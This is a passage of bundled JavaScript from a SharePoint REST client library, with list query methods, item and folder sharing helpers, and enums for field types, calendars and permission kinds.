List.prototype.getItemsByCAMLQuery = function (query) { var expands = []; for (var _i = 1; _i < arguments.length; _i++) { expands[_i - 1] = arguments[_i]; } var q = this.clone(List, "getitems", true); return q.expand.apply(q, expands).post({ body: JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.CamlQuery" } }, query) }), }); }; /** * See: https://msdn.microsoft.com/en-us/library/office/dn292554.aspx */ List.prototype.getListItemChangesSinceToken = function (query) { return this.clone(List, "getlistitemchangessincetoken", true).post({ body: JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.ChangeLogItemQuery" } }, query) }), }, { parse: function (r) { return r.text(); } }); }; /** * Moves the list to the Recycle Bin and returns the identifier of the new Recycle Bin item. 
*/ List.prototype.recycle = function () { return this.clone(List, "recycle", true).post().then(function (data) { if (data.hasOwnProperty("Recycle")) { return data.Recycle; } else { return data; } }); }; /** * Renders list data based on the view xml provided */ List.prototype.renderListData = function (viewXml) { var q = this.clone(List, "renderlistdata(@viewXml)"); q.query.add("@viewXml", "'" + viewXml + "'"); return q.post().then(function (data) { // data will be a string, so we parse it again data = JSON.parse(data); if (data.hasOwnProperty("RenderListData")) { return data.RenderListData; } else { return data; } }); }; /** * Gets the field values and field schema attributes for a list item. */ List.prototype.renderListFormData = function (itemId, formId, mode) { return this.clone(List, "renderlistformdata(itemid=" + itemId + ", formid='" + formId + "', mode='" + mode + "')", true).post().then(function (data) { // data will be a string, so we parse it again data = JSON.parse(data); if (data.hasOwnProperty("ListData")) { return data.ListData; } else { return data; } }); }; /** * Reserves a list item ID for idempotent list item creation. */ List.prototype.reserveListItemId = function () { return this.clone(List, "reservelistitemid", true).post().then(function (data) { if (data.hasOwnProperty("ReserveListItemId")) { return data.ReserveListItemId; } else { return data; } }); }; /** * Returns the ListItemEntityTypeFullName for this list, used when adding/updating list items. Does not support batching. * */ List.prototype.getListItemEntityTypeFullName = function () { return this.clone(List, null).select("ListItemEntityTypeFullName").getAs().then(function (o) { return o.ListItemEntityTypeFullName; }); }; return List; }(queryablesecurable_1.QueryableSecurable)); exports.List = List; /***/ }), /* 12 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var webs_1 = __webpack_require__(8); var odata_1 = __webpack_require__(2); var queryable_1 = __webpack_require__(1); var queryablesecurable_1 = __webpack_require__(26); var types_1 = __webpack_require__(13); /** * Internal helper class used to augment classes to include sharing functionality */ var QueryableShareable = (function (_super) { __extends(QueryableShareable, _super); function QueryableShareable() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a sharing link for the supplied * * @param kind The kind of link to share * @param expiration The optional expiration for this link */ QueryableShareable.prototype.getShareLink = function (kind, expiration) { if (expiration === void 0) { expiration = null; } // date needs to be an ISO string or null var expString = expiration !== null ? 
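// --- Usage sketch (illustrative comment only). The expiration passed to
// getShareLink must be a Date (serialized to an ISO string just below) or null.
// Assuming a SharingLinkKind enum imported from this library's types module, a
// call might look like:
//
//   item.getShareLink(SharingLinkKind.AnonymousView, new Date(Date.now() + 86400000))
//       .then(function (response) { console.log(response); });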
expiration.toISOString() : null; // clone using the factory and send the request return this.clone(QueryableShareable, "shareLink", true).postAs({ body: JSON.stringify({ request: { createLink: true, emailData: null, settings: { expiration: expString, linkKind: kind, }, }, }), }); }; /** * Shares this instance with the supplied users * * @param loginNames Resolved login names to share * @param role The sharing role to apply * @param requireSignin True to require that the user is authenticated, otherwise false * @param propagateAcl True to apply this share to all children * @param emailData If supplied an email will be sent with the indicated properties */ QueryableShareable.prototype.shareWith = function (loginNames, role, requireSignin, propagateAcl, emailData) { var _this = this; if (requireSignin === void 0) { requireSignin = true; } if (propagateAcl === void 0) { propagateAcl = false; } // handle the multiple input types if (!Array.isArray(loginNames)) { loginNames = [loginNames]; } var userStr = JSON.stringify(loginNames.map(function (login) { return { Key: login }; })); var roleFilter = role === types_1.SharingRole.Edit ? types_1.RoleType.Contributor : types_1.RoleType.Reader; // start by looking up the role definition id we need to set the roleValue return webs_1.Web.fromUrl(this.toUrl()).roleDefinitions.select("Id").filter("RoleTypeKind eq " + roleFilter).get().then(function (def) { if (!Array.isArray(def) || def.length < 1) { throw new Error("Could not locate a role definition with RoleTypeKind " + roleFilter); } var postBody = { includeAnonymousLinkInEmail: requireSignin, peoplePickerInput: userStr, propagateAcl: propagateAcl, roleValue: "role:" + def[0].Id, useSimplifiedRoles: true, }; if (typeof emailData !== "undefined") { postBody = util_1.Util.extend(postBody, { emailBody: emailData.body, emailSubject: typeof emailData.subject !== "undefined" ? emailData.subject : "", sendEmail: true, }); } return _this.clone(QueryableShareable, "shareObject", true).postAs({ body: JSON.stringify(postBody), }); }); }; /** * Shares an object based on the supplied options * * @param options The set of options to send to the ShareObject method * @param bypass If true any processing is skipped and the options are sent directly to the ShareObject method */ QueryableShareable.prototype.shareObject = function (options, bypass) { var _this = this; if (bypass === void 0) { bypass = false; } if (bypass) { // if the bypass flag is set send the supplied parameters directly to the service return this.sendShareObjectRequest(options); } // extend our options with some defaults options = util_1.Util.extend(options, { group: null, includeAnonymousLinkInEmail: false, propagateAcl: false, useSimplifiedRoles: true, }, true); return this.getRoleValue(options.role, options.group).then(function (roleValue) { // handle the multiple input types if (!Array.isArray(options.loginNames)) { options.loginNames = [options.loginNames]; } var userStr = JSON.stringify(options.loginNames.map(function (login) { return { Key: login }; })); var postBody = { peoplePickerInput: userStr, roleValue: roleValue, url: options.url, }; if (typeof options.emailData !== "undefined" && options.emailData !== null) { postBody = util_1.Util.extend(postBody, { emailBody: options.emailData.body, emailSubject: typeof options.emailData.subject !== "undefined" ?
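// --- Usage sketch (illustrative comment only). Sharing with a resolved login
// name via the shareWith method above; the claims-style login shown is an
// assumed example value:
//
//   item.shareWith("i:0#.f|membership|user@contoso.com", SharingRole.Edit)
//       .then(function (result) { console.log(result); });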
options.emailData.subject : "Shared with you.", sendEmail: true, }); } return _this.sendShareObjectRequest(postBody); }); }; /** * Calls the web's UnshareObject method * * @param url The url of the object to unshare */ QueryableShareable.prototype.unshareObjectWeb = function (url) { return this.clone(QueryableShareable, "unshareObject", true).postAs({ body: JSON.stringify({ url: url, }), }); }; /** * Checks Permissions on the list of Users and returns back role the users have on the Item. * * @param recipients The array of Entities for which Permissions need to be checked. */ QueryableShareable.prototype.checkPermissions = function (recipients) { return this.clone(QueryableShareable, "checkPermissions", true).postAs({ body: JSON.stringify({ recipients: recipients, }), }); }; /** * Get Sharing Information. * * @param request The SharingInformationRequest Object. */ QueryableShareable.prototype.getSharingInformation = function (request) { if (request === void 0) { request = null; } return this.clone(QueryableShareable, "getSharingInformation", true).postAs({ body: JSON.stringify({ request: request, }), }); }; /** * Gets the sharing settings of an item. * * @param useSimplifiedRoles Determines whether to use simplified roles. */ QueryableShareable.prototype.getObjectSharingSettings = function (useSimplifiedRoles) { if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } return this.clone(QueryableShareable, "getObjectSharingSettings", true).postAs({ body: JSON.stringify({ useSimplifiedRoles: useSimplifiedRoles, }), }); }; /** * Unshares this object */ QueryableShareable.prototype.unshareObject = function () { return this.clone(QueryableShareable, "unshareObject", true).postAs(); }; /** * Deletes a link by type * * @param kind Deletes a sharing link by the kind of link */ QueryableShareable.prototype.deleteLinkByKind = function (kind) { return this.clone(QueryableShareable, "deleteLinkByKind", true).post({ body: JSON.stringify({ linkKind: kind }), }); }; /** * Removes the specified link to the item. * * @param kind The kind of link to be deleted. * @param shareId */ QueryableShareable.prototype.unshareLink = function (kind, shareId) { if (shareId === void 0) { shareId = "00000000-0000-0000-0000-000000000000"; } return this.clone(QueryableShareable, "unshareLink", true).post({ body: JSON.stringify({ linkKind: kind, shareId: shareId }), }); }; /** * Calculates the roleValue string used in the sharing query * * @param role The Sharing Role * @param group The Group type */ QueryableShareable.prototype.getRoleValue = function (role, group) { // we will give group precedence, because we had to make a choice if (typeof group !== "undefined" && group !== null) { switch (group) { case types_1.RoleType.Contributor: return webs_1.Web.fromUrl(this.toUrl()).associatedMemberGroup.select("Id").getAs().then(function (g) { return "group: " + g.Id; }); case types_1.RoleType.Reader: case types_1.RoleType.Guest: return webs_1.Web.fromUrl(this.toUrl()).associatedVisitorGroup.select("Id").getAs().then(function (g) { return "group: " + g.Id; }); default: throw new Error("Could not determine role value for supplied value. Contributor, Reader, and Guest are supported"); } } else { var roleFilter = role === types_1.SharingRole.Edit ? 
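// Note (added comment): as in shareWith above, getRoleValue maps
// SharingRole.Edit to the Contributor role definition and any other sharing
// role to Reader before looking up the matching role definition id.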
types_1.RoleType.Contributor : types_1.RoleType.Reader; return webs_1.Web.fromUrl(this.toUrl()).roleDefinitions.select("Id").top(1).filter("RoleTypeKind eq " + roleFilter).getAs().then(function (def) { if (def.length < 1) { throw new Error("Could not locate associated role definition for supplied role. Edit and View are supported"); } return "role: " + def[0].Id; }); } }; QueryableShareable.prototype.getShareObjectWeb = function (candidate) { return Promise.resolve(webs_1.Web.fromUrl(candidate, "/_api/SP.Web.ShareObject")); }; QueryableShareable.prototype.sendShareObjectRequest = function (options) { return this.getShareObjectWeb(this.toUrl()).then(function (web) { return web.expand("UsersWithAccessRequests", "GroupsSharedWith").as(QueryableShareable).post({ body: JSON.stringify(options), }); }); }; return QueryableShareable; }(queryable_1.Queryable)); exports.QueryableShareable = QueryableShareable; var QueryableShareableWeb = (function (_super) { __extends(QueryableShareableWeb, _super); function QueryableShareableWeb() { return _super !== null && _super.apply(this, arguments) || this; } /** * Shares this web with the supplied users * @param loginNames The resolved login names to share * @param role The role to use when sharing this web * @param emailData Optional email data */ QueryableShareableWeb.prototype.shareWith = function (loginNames, role, emailData) { var _this = this; if (role === void 0) { role = types_1.SharingRole.View; } var dependency = this.addBatchDependency(); return webs_1.Web.fromUrl(this.toUrl(), "/_api/web/url").get().then(function (url) { dependency(); return _this.shareObject(util_1.Util.combinePaths(url, "/_layouts/15/aclinv.aspx?forSharing=1&mbypass=1"), loginNames, role, emailData); }); }; /** * Provides direct access to the static web.ShareObject method * * @param url The url to share * @param loginNames Resolved login names string[] or a single login name string * @param role Role value * @param emailData Optional email data * @param group Optional group id * @param propagateAcl True to apply this share to all children * @param includeAnonymousLinkInEmail * @param useSimplifiedRoles */ QueryableShareableWeb.prototype.shareObject = function (url, loginNames, role, emailData, group, propagateAcl, includeAnonymousLinkInEmail, useSimplifiedRoles) { if (propagateAcl === void 0) { propagateAcl = false; } if (includeAnonymousLinkInEmail === void 0) { includeAnonymousLinkInEmail = false; } if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } return this.clone(QueryableShareable, null, true).shareObject({ emailData: emailData, group: group, includeAnonymousLinkInEmail: includeAnonymousLinkInEmail, loginNames: loginNames, propagateAcl: propagateAcl, role: role, url: url, useSimplifiedRoles: useSimplifiedRoles, }); }; /** * Supplies a method to pass any set of arguments to ShareObject * * @param options The set of options to send to ShareObject */ QueryableShareableWeb.prototype.shareObjectRaw = function (options) { return this.clone(QueryableShareable, null, true).shareObject(options, true); }; /** * Unshares the object * * @param url The url of the object to stop sharing */ QueryableShareableWeb.prototype.unshareObject = function (url) { return this.clone(QueryableShareable, null, true).unshareObjectWeb(url); }; return QueryableShareableWeb; }(queryablesecurable_1.QueryableSecurable)); exports.QueryableShareableWeb = QueryableShareableWeb; var QueryableShareableItem = (function (_super) { __extends(QueryableShareableItem, _super); function QueryableShareableItem() { return _super !== null &&
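// --- Usage sketch (illustrative comment only). Sharing a web via the
// QueryableShareableWeb.shareWith method above; the login name is an assumed
// example value and SharingRole.View is the default role:
//
//   web.shareWith("i:0#.f|membership|user@contoso.com", SharingRole.View)
//       .then(function (result) { console.log(result); });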
_super.apply(this, arguments) || this; } /** * Gets a link suitable for sharing for this item * * @param kind The type of link to share * @param expiration The optional expiration date */ QueryableShareableItem.prototype.getShareLink = function (kind, expiration) { if (kind === void 0) { kind = types_1.SharingLinkKind.OrganizationView; } if (expiration === void 0) { expiration = null; } return this.clone(QueryableShareable, null, true).getShareLink(kind, expiration); }; /** * Shares this item with one or more users * * @param loginNames string or string[] of resolved login names to which this item will be shared * @param role The role (View | Edit) applied to the share * @param emailData Optional, if included an email will be sent. Note subject currently has no effect. */ QueryableShareableItem.prototype.shareWith = function (loginNames, role, requireSignin, emailData) { if (role === void 0) { role = types_1.SharingRole.View; } if (requireSignin === void 0) { requireSignin = true; } return this.clone(QueryableShareable, null, true).shareWith(loginNames, role, requireSignin, false, emailData); }; /** * Checks Permissions on the list of Users and returns back role the users have on the Item. * * @param recipients The array of Entities for which Permissions need to be checked. */ QueryableShareableItem.prototype.checkSharingPermissions = function (recipients) { return this.clone(QueryableShareable, null, true).checkPermissions(recipients); }; /** * Get Sharing Information. * * @param request The SharingInformationRequest Object. */ QueryableShareableItem.prototype.getSharingInformation = function (request) { if (request === void 0) { request = null; } return this.clone(QueryableShareable, null, true).getSharingInformation(request); }; /** * Gets the sharing settings of an item. * * @param useSimplifiedRoles Determines whether to use simplified roles. */ QueryableShareableItem.prototype.getObjectSharingSettings = function (useSimplifiedRoles) { if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } return this.clone(QueryableShareable, null, true).getObjectSharingSettings(useSimplifiedRoles); }; /** * Unshare this item */ QueryableShareableItem.prototype.unshare = function () { return this.clone(QueryableShareable, null, true).unshareObject(); }; /** * Deletes a sharing link by kind * * @param kind Deletes a sharing link by the kind of link */ QueryableShareableItem.prototype.deleteSharingLinkByKind = function (kind) { return this.clone(QueryableShareable, null, true).deleteLinkByKind(kind); }; /** * Removes the specified link to the item. * * @param kind The kind of link to be deleted.
* @param shareId */ QueryableShareableItem.prototype.unshareLink = function (kind, shareId) { return this.clone(QueryableShareable, null, true).unshareLink(kind, shareId); }; return QueryableShareableItem; }(queryablesecurable_1.QueryableSecurable)); exports.QueryableShareableItem = QueryableShareableItem; var FileFolderShared = (function (_super) { __extends(FileFolderShared, _super); function FileFolderShared() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a link suitable for sharing * * @param kind The kind of link to get * @param expiration Optional, an expiration for this link */ FileFolderShared.prototype.getShareLink = function (kind, expiration) { if (kind === void 0) { kind = types_1.SharingLinkKind.OrganizationView; } if (expiration === void 0) { expiration = null; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.getShareLink(kind, expiration); }); }; /** * Checks Permissions on the list of Users and returns back role the users have on the Item. * * @param recipients The array of Entities for which Permissions need to be checked. */ FileFolderShared.prototype.checkSharingPermissions = function (recipients) { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.checkPermissions(recipients); }); }; /** * Get Sharing Information. * * @param request The SharingInformationRequest Object. */ FileFolderShared.prototype.getSharingInformation = function (request) { if (request === void 0) { request = null; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.getSharingInformation(request); }); }; /** * Gets the sharing settings of an item. * * @param useSimplifiedRoles Determines whether to use simplified roles. */ FileFolderShared.prototype.getObjectSharingSettings = function (useSimplifiedRoles) { if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.getObjectSharingSettings(useSimplifiedRoles); }); }; /** * Unshare this item */ FileFolderShared.prototype.unshare = function () { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.unshareObject(); }); }; /** * Deletes a sharing link by the kind of link * * @param kind The kind of link to be deleted. */ FileFolderShared.prototype.deleteSharingLinkByKind = function (kind) { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.deleteLinkByKind(kind); }); }; /** * Removes the specified link to the item. * * @param kind The kind of link to be deleted. 
* @param shareId The share id to delete */ FileFolderShared.prototype.unshareLink = function (kind, shareId) { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.unshareLink(kind, shareId); }); }; /** * For files and folders we need to use the associated item end point */ FileFolderShared.prototype.getShareable = function () { var _this = this; // sharing only works on the item end point, not the file one - so we create a shareable instance against the item url internally return this.clone(QueryableShareableFile, "listItemAllFields", false).select("odata.editlink").get().then(function (d) { var shareable = new QueryableShareable(odata_1.getEntityUrl(d)); // we need to handle batching if (_this.hasBatch) { shareable = shareable.inBatch(_this.batch); } return shareable; }); }; return FileFolderShared; }(queryable_1.QueryableInstance)); exports.FileFolderShared = FileFolderShared; var QueryableShareableFile = (function (_super) { __extends(QueryableShareableFile, _super); function QueryableShareableFile() { return _super !== null && _super.apply(this, arguments) || this; } /** * Shares this item with one or more users * * @param loginNames string or string[] of resolved login names to which this item will be shared * @param role The role (View | Edit) applied to the share * @param requireSignin If true the user must sign in to view the link, otherwise anyone with the link can access the resource * @param emailData Optional, if included an email will be sent. Note subject currently has no effect. */ QueryableShareableFile.prototype.shareWith = function (loginNames, role, requireSignin, emailData) { if (role === void 0) { role = types_1.SharingRole.View; } if (requireSignin === void 0) { requireSignin = true; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.shareWith(loginNames, role, requireSignin, false, emailData); }); }; return QueryableShareableFile; }(FileFolderShared)); exports.QueryableShareableFile = QueryableShareableFile; var QueryableShareableFolder = (function (_super) { __extends(QueryableShareableFolder, _super); function QueryableShareableFolder() { return _super !== null && _super.apply(this, arguments) || this; } /** * Shares this item with one or more users * * @param loginNames string or string[] of resolved login names to which this item will be shared * @param role The role (View | Edit) applied to the share * @param shareEverything Share everything in this folder, even items with unique permissions. * @param requireSignin If true the user must sign in to view the link, otherwise anyone with the link can access the resource * @param emailData Optional, if included an email will be sent. Note subject currently has no effect.
*/ QueryableShareableFolder.prototype.shareWith = function (loginNames, role, requireSignin, shareEverything, emailData) { if (role === void 0) { role = types_1.SharingRole.View; } if (requireSignin === void 0) { requireSignin = true; } if (shareEverything === void 0) { shareEverything = false; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.shareWith(loginNames, role, requireSignin, shareEverything, emailData); }); }; return QueryableShareableFolder; }(FileFolderShared)); exports.QueryableShareableFolder = QueryableShareableFolder; /***/ }), /* 13 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; // reference: https://msdn.microsoft.com/en-us/library/office/dn600183.aspx Object.defineProperty(exports, "__esModule", { value: true }); /** * Determines the display mode of the given control or view */ var ControlMode; (function (ControlMode) { ControlMode[ControlMode["Display"] = 1] = "Display"; ControlMode[ControlMode["Edit"] = 2] = "Edit"; ControlMode[ControlMode["New"] = 3] = "New"; })(ControlMode = exports.ControlMode || (exports.ControlMode = {})); /** * Specifies the type of the field. */ var FieldTypes; (function (FieldTypes) { FieldTypes[FieldTypes["Invalid"] = 0] = "Invalid"; FieldTypes[FieldTypes["Integer"] = 1] = "Integer"; FieldTypes[FieldTypes["Text"] = 2] = "Text"; FieldTypes[FieldTypes["Note"] = 3] = "Note"; FieldTypes[FieldTypes["DateTime"] = 4] = "DateTime"; FieldTypes[FieldTypes["Counter"] = 5] = "Counter"; FieldTypes[FieldTypes["Choice"] = 6] = "Choice"; FieldTypes[FieldTypes["Lookup"] = 7] = "Lookup"; FieldTypes[FieldTypes["Boolean"] = 8] = "Boolean"; FieldTypes[FieldTypes["Number"] = 9] = "Number"; FieldTypes[FieldTypes["Currency"] = 10] = "Currency"; FieldTypes[FieldTypes["URL"] = 11] = "URL"; FieldTypes[FieldTypes["Computed"] = 12] = "Computed"; FieldTypes[FieldTypes["Threading"] = 13] = "Threading"; FieldTypes[FieldTypes["Guid"] = 14] = "Guid"; FieldTypes[FieldTypes["MultiChoice"] = 15] = "MultiChoice"; FieldTypes[FieldTypes["GridChoice"] = 16] = "GridChoice"; FieldTypes[FieldTypes["Calculated"] = 17] = "Calculated"; FieldTypes[FieldTypes["File"] = 18] = "File"; FieldTypes[FieldTypes["Attachments"] = 19] = "Attachments"; FieldTypes[FieldTypes["User"] = 20] = "User"; FieldTypes[FieldTypes["Recurrence"] = 21] = "Recurrence"; FieldTypes[FieldTypes["CrossProjectLink"] = 22] = "CrossProjectLink"; FieldTypes[FieldTypes["ModStat"] = 23] = "ModStat"; FieldTypes[FieldTypes["Error"] = 24] = "Error"; FieldTypes[FieldTypes["ContentTypeId"] = 25] = "ContentTypeId"; FieldTypes[FieldTypes["PageSeparator"] = 26] = "PageSeparator"; FieldTypes[FieldTypes["ThreadIndex"] = 27] = "ThreadIndex"; FieldTypes[FieldTypes["WorkflowStatus"] = 28] = "WorkflowStatus"; FieldTypes[FieldTypes["AllDayEvent"] = 29] = "AllDayEvent"; FieldTypes[FieldTypes["WorkflowEventType"] = 30] = "WorkflowEventType"; })(FieldTypes = exports.FieldTypes || (exports.FieldTypes = {})); var DateTimeFieldFormatType; (function (DateTimeFieldFormatType) { DateTimeFieldFormatType[DateTimeFieldFormatType["DateOnly"] = 0] = "DateOnly"; DateTimeFieldFormatType[DateTimeFieldFormatType["DateTime"] = 1] = "DateTime"; })(DateTimeFieldFormatType = exports.DateTimeFieldFormatType || (exports.DateTimeFieldFormatType = {})); /** * Specifies the control settings while adding a field. 
*/ var AddFieldOptions; (function (AddFieldOptions) { /** * Specify that a new field added to the list must also be added to the default content type in the site collection */ AddFieldOptions[AddFieldOptions["DefaultValue"] = 0] = "DefaultValue"; /** * Specify that a new field added to the list must also be added to the default content type in the site collection. */ AddFieldOptions[AddFieldOptions["AddToDefaultContentType"] = 1] = "AddToDefaultContentType"; /** * Specify that a new field must not be added to any other content type */ AddFieldOptions[AddFieldOptions["AddToNoContentType"] = 2] = "AddToNoContentType"; /** * Specify that a new field that is added to the specified list must also be added to all content types in the site collection */ AddFieldOptions[AddFieldOptions["AddToAllContentTypes"] = 4] = "AddToAllContentTypes"; /** * Specify adding an internal field name hint for the purpose of avoiding possible database locking or field renaming operations */ AddFieldOptions[AddFieldOptions["AddFieldInternalNameHint"] = 8] = "AddFieldInternalNameHint"; /** * Specify that a new field that is added to the specified list must also be added to the default list view */ AddFieldOptions[AddFieldOptions["AddFieldToDefaultView"] = 16] = "AddFieldToDefaultView"; /** * Specify to confirm that no other field has the same display name */ AddFieldOptions[AddFieldOptions["AddFieldCheckDisplayName"] = 32] = "AddFieldCheckDisplayName"; })(AddFieldOptions = exports.AddFieldOptions || (exports.AddFieldOptions = {})); var CalendarType; (function (CalendarType) { CalendarType[CalendarType["Gregorian"] = 1] = "Gregorian"; CalendarType[CalendarType["Japan"] = 3] = "Japan"; CalendarType[CalendarType["Taiwan"] = 4] = "Taiwan"; CalendarType[CalendarType["Korea"] = 5] = "Korea"; CalendarType[CalendarType["Hijri"] = 6] = "Hijri"; CalendarType[CalendarType["Thai"] = 7] = "Thai"; CalendarType[CalendarType["Hebrew"] = 8] = "Hebrew"; CalendarType[CalendarType["GregorianMEFrench"] = 9] = "GregorianMEFrench"; CalendarType[CalendarType["GregorianArabic"] = 10] = "GregorianArabic"; CalendarType[CalendarType["GregorianXLITEnglish"] = 11] = "GregorianXLITEnglish"; CalendarType[CalendarType["GregorianXLITFrench"] = 12] = "GregorianXLITFrench"; CalendarType[CalendarType["KoreaJapanLunar"] = 14] = "KoreaJapanLunar"; CalendarType[CalendarType["ChineseLunar"] = 15] = "ChineseLunar"; CalendarType[CalendarType["SakaEra"] = 16] = "SakaEra"; CalendarType[CalendarType["UmAlQura"] = 23] = "UmAlQura"; })(CalendarType = exports.CalendarType || (exports.CalendarType = {})); var UrlFieldFormatType; (function (UrlFieldFormatType) { UrlFieldFormatType[UrlFieldFormatType["Hyperlink"] = 0] = "Hyperlink"; UrlFieldFormatType[UrlFieldFormatType["Image"] = 1] = "Image"; })(UrlFieldFormatType = exports.UrlFieldFormatType || (exports.UrlFieldFormatType = {})); var PermissionKind; (function (PermissionKind) { /** * Has no permissions on the Site. Not available through the user interface. */ PermissionKind[PermissionKind["EmptyMask"] = 0] = "EmptyMask"; /** * View items in lists, documents in document libraries, and Web discussion comments. */ PermissionKind[PermissionKind["ViewListItems"] = 1] = "ViewListItems"; /** * Add items to lists, documents to document libraries, and Web discussion comments. */ PermissionKind[PermissionKind["AddListItems"] = 2] = "AddListItems"; /** * Edit items in lists, edit documents in document libraries, edit Web discussion comments * in documents, and customize Web Part Pages in document libraries. 
*/ PermissionKind[PermissionKind["EditListItems"] = 3] = "EditListItems"; /** * Delete items from a list, documents from a document library, and Web discussion * comments in documents. */ PermissionKind[PermissionKind["DeleteListItems"] = 4] = "DeleteListItems"; /** * Approve a minor version of a list item or document. */ PermissionKind[PermissionKind["ApproveItems"] = 5] = "ApproveItems"; /** * View the source of documents with server-side file handlers. */ PermissionKind[PermissionKind["OpenItems"] = 6] = "OpenItems"; /** * View past versions of a list item or document. */ PermissionKind[PermissionKind["ViewVersions"] = 7] = "ViewVersions"; /** * Delete past versions of a list item or document. */ PermissionKind[PermissionKind["DeleteVersions"] = 8] = "DeleteVersions"; /** * Discard or check in a document which is checked out to another user. */ PermissionKind[PermissionKind["CancelCheckout"] = 9] = "CancelCheckout"; /** * Create, change, and delete personal views of lists. */ PermissionKind[PermissionKind["ManagePersonalViews"] = 10] = "ManagePersonalViews"; /** * Create and delete lists, add or remove columns in a list, and add or remove public views of a list. */ PermissionKind[PermissionKind["ManageLists"] = 12] = "ManageLists"; /** * View forms, views, and application pages, and enumerate lists. */ PermissionKind[PermissionKind["ViewFormPages"] = 13] = "ViewFormPages"; /** * Make content of a list or document library retrieveable for anonymous users through SharePoint search. * The list permissions in the site do not change. */ PermissionKind[PermissionKind["AnonymousSearchAccessList"] = 14] = "AnonymousSearchAccessList"; /** * Allow users to open a Site, list, or folder to access items inside that container. */ PermissionKind[PermissionKind["Open"] = 17] = "Open"; /** * View pages in a Site. */ PermissionKind[PermissionKind["ViewPages"] = 18] = "ViewPages"; /** * Add, change, or delete HTML pages or Web Part Pages, and edit the Site using * a Windows SharePoint Services compatible editor. */ PermissionKind[PermissionKind["AddAndCustomizePages"] = 19] = "AddAndCustomizePages"; /** * Apply a theme or borders to the entire Site. */ PermissionKind[PermissionKind["ApplyThemeAndBorder"] = 20] = "ApplyThemeAndBorder"; /** * Apply a style sheet (.css file) to the Site. */ PermissionKind[PermissionKind["ApplyStyleSheets"] = 21] = "ApplyStyleSheets"; /** * View reports on Site usage. */ PermissionKind[PermissionKind["ViewUsageData"] = 22] = "ViewUsageData"; /** * Create a Site using Self-Service Site Creation. */ PermissionKind[PermissionKind["CreateSSCSite"] = 23] = "CreateSSCSite"; /** * Create subsites such as team sites, Meeting Workspace sites, and Document Workspace sites. */ PermissionKind[PermissionKind["ManageSubwebs"] = 24] = "ManageSubwebs"; /** * Create a group of users that can be used anywhere within the site collection. */ PermissionKind[PermissionKind["CreateGroups"] = 25] = "CreateGroups"; /** * Create and change permission levels on the Site and assign permissions to users * and groups. */ PermissionKind[PermissionKind["ManagePermissions"] = 26] = "ManagePermissions"; /** * Enumerate files and folders in a Site using Microsoft Office SharePoint Designer * and WebDAV interfaces. */ PermissionKind[PermissionKind["BrowseDirectories"] = 27] = "BrowseDirectories"; /** * View information about users of the Site. */ PermissionKind[PermissionKind["BrowseUserInfo"] = 28] = "BrowseUserInfo"; /** * Add or remove personal Web Parts on a Web Part Page. 
*/ PermissionKind[PermissionKind["AddDelPrivateWebParts"] = 29] = "AddDelPrivateWebParts"; /** * Update Web Parts to display personalized information. */ PermissionKind[PermissionKind["UpdatePersonalWebParts"] = 30] = "UpdatePersonalWebParts"; /** * Grant the ability to perform all administration tasks for the Site as well as * manage content, activate, deactivate, or edit properties of Site scoped Features * through the object model or through the user interface (UI). When granted on the * root Site of a Site Collection, activate, deactivate, or edit properties of * site collection scoped Features through the object model. To browse to the Site * Collection Features page and activate or deactivate Site Collection scoped Features * through the UI, you must be a Site Collection administrator. */ PermissionKind[PermissionKind["ManageWeb"] = 31] = "ManageWeb"; /** * Content of lists and document libraries in the Web site will be retrieveable for anonymous users through * SharePoint search if the list or document library has AnonymousSearchAccessList set. */ PermissionKind[PermissionKind["AnonymousSearchAccessWebLists"] = 32] = "AnonymousSearchAccessWebLists"; /** * Use features that launch client applications. Otherwise, users must work on documents * locally and upload changes. */ PermissionKind[PermissionKind["UseClientIntegration"] = 37] = "UseClientIntegration"; /** * Use SOAP, WebDAV, or Microsoft Office SharePoint Designer interfaces to access the Site. */ PermissionKind[PermissionKind["UseRemoteAPIs"] = 38] = "UseRemoteAPIs"; /** * Manage alerts for all users of the Site. */ PermissionKind[PermissionKind["ManageAlerts"] = 39] = "ManageAlerts"; /** * Create e-mail alerts. */ PermissionKind[PermissionKind["CreateAlerts"] = 40] = "CreateAlerts"; /** * Allows a user to change his or her user information, such as adding a picture. */ PermissionKind[PermissionKind["EditMyUserInfo"] = 41] = "EditMyUserInfo"; /** * Enumerate permissions on Site, list, folder, document, or list item. */ PermissionKind[PermissionKind["EnumeratePermissions"] = 63] = "EnumeratePermissions"; /** * Has all permissions on the Site. Not available through the user interface. 
